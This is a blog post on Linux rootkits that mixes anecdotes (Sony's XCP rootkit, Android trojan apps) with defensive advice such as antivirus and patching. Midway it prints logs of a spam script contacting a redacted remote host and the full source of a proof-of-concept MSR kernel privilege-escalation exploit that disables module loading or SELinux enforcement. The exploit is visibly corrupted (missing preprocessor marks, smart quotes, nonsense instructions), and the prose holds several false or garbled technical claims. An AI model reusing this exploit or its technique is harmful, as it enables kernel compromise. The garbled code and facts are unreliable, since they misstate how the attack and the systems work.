What You Need to Know About Linux Rootkits 2023

Ahmad Khan May 14, 2023May 14, 2023 0 Comments black hat pakistan, Ethical hacking, hacking, What You Need to Know About Linux Rootkits

In this article we will learn about Linux Rootkits.

Introduction to Linux Rootkits:

Imagine using a computer, server, smartphone or tablet. The operating system and applications on it do not behave as they usually do.

Open the Google search page in your web browser. You will be redirected to a web page full of flashing web banners saying “Your computer has 6,666 viruses! Click here to remove them now!”

Britney Spears is your guilty pleasure. You insert the CD of her album Blackout into the optical drive of your laptop, which you bought from HMV in 2007. Instead of your default music app playing the sweet sounds of “Gimme More”, a window pops up. “This CD needs a special program to play it. Click here!”

You will go back to the desktop. Double-click the iTunes icon. Instead of launching iTunes, it does something else. “Hot Russian chicks… They are lonely, horny and desperate! They want to talk to YOU! Click here!”

Your best friend calls you on your Android smartphone. “Why do you keep texting me about ‘one weird trick’ to lose weight?”

Anyone reasonably familiar with computer technology could probably guess that malware is the culprit behind the whole debacle.

Throughout my career in IT security, I interact with both end users and computer professionals from all walks of life. There has been so much Windows-targeted malware circulating the Internet over the past few decades that most Windows users, even if they use up-to-date antivirus shields, are familiar with many of the symptoms of infection.

It’s also a popular myth that malware is exclusively a Windows problem. Many Apple fans say, “I don’t need an antivirus, I use a Mac!”

And although x86 Linux distro users tend to be more tech-savvy than most, many of them, even those who work in IT, would never consider malware an option on their platform.

Malware is one of my primary areas of professional focus and study. I saved data centers from malware that crippled their entire internal networks.

I’ve said it over and over; any computer that can receive external data, whether through a network or removable media, can become infected with malware. The only way to guarantee that a computer, be it a PC, server, smartphone, tablet or embedded system, will never be infected is to thoroughly examine its data storage on disks and firmware, and then completely cut it off from the network and removable media. And that’s just not believable, especially in the 21st century.

Also Read:UEFI Boot vs. the MBR/VBR Boot Process-byBlackhat Pakistan 2023

Your typical end user will probably never see Ubuntu, Fedora, or Linux Mint. But they use the Linux kernel, probably every day. And more than half of all web servers run a Linux distro with HTTP/HTTPS services powered by Apache.

Android, on both smartphones and tablets, now has a larger share of the mobile market than Apple’s iOS. Although Android is mainly proprietary Java code, underneath is an open source Linux kernel.

So maybe billions of people use Linux every day and don’t even know it.

Of course, Linux is just a kernel. What kind of malware targets kernels? Rootkits!

Unlike many other types of malware, rootkits do not spread by themselves. Something must be supplied by the rootkit. It could be a virus that attaches itself to program files or other code. It could be a worm that spreads through the network like wildfire. It could be a USB flash drive that your friend lent you with photos from a family vacation. It could even be a popular website that uses server-side scripting technology like JavaScript. And most malware-infected websites were not designed with malicious intent. There can be vulnerabilities in the code, and this was exploited by a bot that distributes web malware.

Blackhats who script rootkits don’t always fit the “hacker” stereotype. At least one multi-billion dollar corporation, Sony, was caught red-handed in 2005. Sony/BMG is Britney Spears’ record label and is also the label for a large percentage of the most popular rock stars and bands.

Sony/BMG, like other big players in the music industry, has been stressed about lost revenue from music piracy since Napster became a phenomenon in 1999. So many of the CDs of Billboard’s best-selling albums that Sony sold between about 2005 and 2007, had rootkits. hidden on them.

One of the first rootkits developed by Sony/BMG, XCP, was discovered by IT security researcher Mark Russinovich on October 31, 2005. Its existence was never mentioned in any relevant end-user license agreement.

Although the rootkit was designed to prevent consumers from copying music files from Sony/BMG CDs to pirate over the Internet, the rootkit also created countless vulnerabilities that could be exploited by more common types of malware, with devastating consequences.

The incident was definitely a bad PR move for Sony.

XCP and other Sony rootkits from this period only targeted Windows client operating systems. But that’s probably because Sony knew that the vast majority of PC users at the time were using Windows. Also, it’s damn easy to write malware in Visual Studio. Many scripts used by script children, even now, are written in this proprietary Microsoft IDE.

But blackhats, whether prototypical criminals or employees of large corporations, are now usually aware that most web servers and mobile devices run the Linux kernel.

Linux rootkits have already been identified.

In November 2012, the dreaded Linux rootkit was a hot topic in the tech media world. It focused on Linux server distributions that were based on Debian. The specific Linux kernel version it was using was 2.6.32-5-amd64.

By penetrating the core, it would then spread through JavaScript code embedded in a web page that works with the HTML

[bash]
server:~# perl spam_scipt
wget version is 11
Set wget browser
Warning: bad ps syntax, maybe bogus “-“? See http://procps.sf.net/faq.html
Found postfix running, use /usr/sbin/sendmail
Redacted.info probe host
Go to https://ibkxluxisp.redacted.info:1905//b/index.php?id=5cb885d577c7bbacdae44dd9f7f86b641ad60d58b1b9df07b97953a70376ec47&check=1
Generate host ibkxluxisp.redacted.info:1905
https://ibkxluxisp.redacted.info:1905//b/index.php?id=5fb58ad575c14b08785ae5255ffbf83c9f561d18e961b2eb96dc5a058a41&version=186e745388 1cec
[/bash]

[bash]
server:~# perl spam_scipt
wget version is 11
Set wget browser
Warning: bad ps syntax, maybe bogus “-“? See http://procps.sf.net/faq.html
Found postfix running, use /usr/sbin/sendmail
Redacted.info probe host
Go to https://wodhvqubux.redacted.info:1905//b/index.php?id=5cb186d575c44b1e5174c7c111636063b338bc3ef4d46e4533036eded038a7&check=1
Generate host wodhvqubux.redacted.info:1905
https://wodhvqubux.redacted.info:1905//b/index.php?id=5a497fe86dde12da162b6460bb8cd215966679ad7bf97338b9b6c2e741fe&version=18&sent5344697 server:~#;

[/bash]

For every Linux rootkit someone discovers and posts about online, there must be many more that only the blackhats who developed them know about.

Here is another example. Prior to the release of Linux kernel version 3.7.6, a vulnerability in the msr_open function was located in arch/x86/kernel/msr.c. This allowed rootkits to bypass root in a restricted user account and inject and execute malicious code.

Spender, a user at grsecurity.net, wrote a script designed to exploit this vulnerability. Here it is all.

[C]
// PoC exploit for /dev/cpu/*/msr, 32-bit userspace on 64-bit host
// can do anything in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and only uid 0
// there is a small race between when the MSR is written to the first
// time and when we release our sysenter
// additionally we require CAP_SYS_NICE to almost guarantee winning the race
// configured to take the hex arg of a dword pointer set to 0
// (modules_disabled, selinux_enforcing, choose)
//
// Cheers to Red Hat, who once again showed they don’t care
// public exploit is released. There wasn’t even a bugzilla entry
// their system until this was published — and they have a paid team
// from how many? (who aren’t satisfied until I’ve done all their work
// free, apparently:
// https://twitter.com/kurtseifried/status/299327878233985024)
// It’s not like I didn’t mention the problem and the existence of an easy one
// abuse multiple times before:
// https://twitter.com/grsecurity/status/298977370776432640
// https://twitter.com/grsecurity/status/297365303095078912
// https://twitter.com/grsecurity/status/297189488638181376
// https://twitter.com/grsecurity/status/297030133628416000
// https://twitter.com/grsecurity/status/297029470072745984
// https://twitter.com/grsecurity/status/297028324134359041
//
// spending 2013

define _GNU_SOURCE

include

define SYSENTER_EIP_MSR 0x176

u_int64_t msr;

unsigned long ourstack[65536];

u_int64_t payload_data[16];

extern void *_ring0;
extern void *_ring0_end;

void ring0 (invalid)
{
__asm volatile(“.globl _ring0n”
“_ring0:n”
“.intel_syntax noprefixn”
“.code64n”
// set stack pointer with ‘ourstack’
“mov esp, ecxn”
// store registers, contains original value of MSR
“push raxn”
“push rbxn”
“push rcxn”
“push rdxn”
// play around with the kernel with disabled interrupts here!
“mov rcx, qword ptr [rbx+8]n”
“test rcx, rcxn”
“jz skip_written”
“mov dword ptr [rcx], 0n”
“skip_write:n”
// reset the MSR value before returning
“mov ecx, 0x176n” // SYSENTER_EIP_MSR
“mov eax, dword ptr [rbx] n”
“mov edx, dword ptr [rbx+4]n”
“wrmsrn”
“pop rdxn”
“pop rcxn”
“pop rbxn”
“pop raxn”
“shadow”
“syssexitn”
“.code32n”
“.att_syntax prefixn”
“.global _ring0_endn”
“_ring0_end:n”
);
}

unsigned long stored_stack;

int main(int argc, char *argv[])
{
cpu_set_t set;
int msr_fd;
int lips;
u_int64_t new_msr;
struct sched_param sched;
u_int64_t resolved_addr = 0ULL;

if (argc == 2)
resolved_addr = strtoull(argv[1], NULL, 16);

/* can do this without permission */
mlock(_ring0, (unsigned long)_ring0_end – (unsigned long)_ring0);
mlock(&load_data, size(load_data));

CPU_ZERO(&set);
CPU_SET(0, &set);

sched.sched_priority = 99;

ret = sched_setscheduler(0, SCHED_FIFO, &sched);
if (ret) {
fprintf(stderr, “Cannot set priority.n”);
exit(1);
}

ret = sched_setaffinity(0, sizeof(cpu_set_t), &set);
if (ret) {
fprintf(stderr, “Unable to set affinity.n”);
exit(1);
}

msr_fd = open(“/dev/cpu/0/msr”, O_RDWR);
if (msr_fd < 0) {
msr_fd = open(“/dev/msr0”, O_RDWR);
if (msr_fd < 0) {
fprintf(stderr, “Cannot open /dev/cpu/0/msrn”);
exit(1);
}
}
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
ret = read(msr_fd, &msr, sizeof(msr));
if (ret != sizeof(msr)) {
fprintf(stderr, “Cannot read /dev/cpu/0/msrn”);
exit(1);
}

// stuff some addresses into the buffer whose address we
// pass “kernel” via register
payload_data[0] = msr;
payload_data[1] = resolved_adr;

printf(“Old SYSENTER_EIP_MSR = %016llxn”, msr);
flush(stdout);

lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
new_msr = (u_int64_t)(unsigned long)&_ring0;

printf(“New SYSENTER_EIP_MSR = %016llxn”, new_msr);
flush(stdout);

ret = write(msr_fd, &new_msr, sizeof(new_msr));
if (ret != sizeof(new_msr)) {
fprintf(stderr, “Unable to modify /dev/cpu/0/msrn”);
exit(1);
}

__asm volatile(
“.intel_syntax noprefixn”
“.code32n”
“mov save_stack, espn”
“lea ecx, ourstackn”
“lea edx, label2n”
“lea ebx, payload_datan”
“systemic”
“label2:n”
“mov esp, save_stackn”
“.att_syntax prefixn”
);

printf(“Success.n”);

return 0;
}
[/C]

People like Spender write these scripts so that OS developers can learn how to secure their kernels against rootkits.

I barely scratched the surface. The possibilities of Linux rootkits are endless.

Although typical end users interact with Linux servers through BSD/UNIX-based Windows or Mac OS X and iOS client computers, the only Linux-based OS that end users often directly interact with is Android.

Yes, Android rootkits are Linux rootkits.

In 2011, Reddit user Lompolo discovered that several apps were available on the Android Market (now known as the Google Play Store) that were Trojan horses with Android rootkit code. The developers of the Trojans fell under “Myournet”, “Kingmall2010” and “we20090202”. Some of the names of these various apps were “Super Guitar Solo”, “Hot Sexy Videos”, “Chess”, “Scientific Calculator” and “Advanced App to SD”.

Benn from Intrepdius Group Mobile Security found some Android rootkit code that is likely very similar to the code found in these Trojans.

This kind of scripting can have disastrous effects on Android devices. Spambotting, SMS spreading malware, Android rogue AV, spyware… the possibilities are endless.

Anyone can upload apps to the Google Play Store, but Google goes to great lengths to remove malicious apps from the store as soon as they become aware of them. Then they block the developer account on the Google Play Store. This is great, but useless for zero-day attacks.

So what can you do to avoid falling victim to a Linux rootkit? There’s no way to eliminate the risk 100%, but there are great things you can do to protect yourself and your devices.

ClamAV develops an excellent open source antivirus shield that can run on most x86 Linux distributions, both on the client and on the server. Their development team is constantly looking for Linux-specific threats and vulnerabilities and distributes new malware signatures almost daily. I strongly recommend running ClamAV on all types of x86 Linux machines.

Also, make sure that the Linux distributions of your choice are configured to install security patches as often as possible. More importantly, make sure your operating systems are running the latest stable Linux kernels. Linux kernel developers are constantly working to find vulnerabilities and fix them.

If you’re like me and have an Android device, go to the Google Play Store and install Lookout Mobile Security. His AV shield is free and he also fixes often. A version of Malwarebytes Anti-Malware for Android is also now available.

It won’t conflict with your Lookout AV shield and you can use it regularly to scan for malware. Just beware of false alarms! Many people would rather not admit it, but pirated and cracked commercial Android apps are very popular.

The cracks that many of these pirated apps have are designed to bypass Android DRM, but may not have any harmful effect on your Android device. If you are going to take a risk and install cracked apps, proceed with caution.

Of course, I’m not advocating software piracy. If you really like the cracked app you installed on your Android device, buy a legitimate install as soon as you can afford it. Most Android developers are individuals or small businesses, and they can’t continue developing the tools and games you love if they can’t make money.

As I mentioned earlier, computers running Windows, OS X, iOS, and other non-Linux operating systems can still be infected by rootkits on Linux servers.

No operating system is immune to malware. Clam, Lookout, and Kaspersky develop excellent AV shields for Windows, OS X, iOS, BlackBerry, and UNIX operating systems such as OpenBSD. As with desktop Linux distributions, make sure all your operating systems receive security patches as they become available.

Finally, for any apps, for any operating system, it’s wise to do your research before considering installing them. The web is your friend! Search the web for the app name. Ignore any advertising or PR you find. Read what other “computer geeks” have to say about them on various forums. It’s also a good idea to read third-party reviews of tools and games in respected online and print magazines.

The field of Linux rootkits is constantly evolving, so it’s best to stay up to date and stay informed. It is a risk that affects us all.